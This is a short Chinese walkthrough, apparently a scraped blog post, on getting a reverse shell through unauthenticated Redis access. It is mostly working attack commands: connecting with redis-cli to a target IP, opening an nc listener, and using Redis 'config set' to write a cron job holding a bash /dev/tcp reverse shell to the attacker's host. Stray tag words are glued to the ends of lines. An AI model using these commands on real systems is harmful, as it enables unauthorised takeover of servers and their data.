Redis未受权访问反弹shellredis
目标主机:10.104.11.178shell
攻击机:kalibash
攻击步骤:tcp
1.与目标主机链接code
root@kali:~# /usr/redis/redis-cli -h 10.104.11.178
2.kali主机进行监听blog
nc -l -v -p 9999
3.写入反弹shell语句class
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n" config set dir /var/spool/cron config set dbfilename root save
4.反弹shell链接成功cli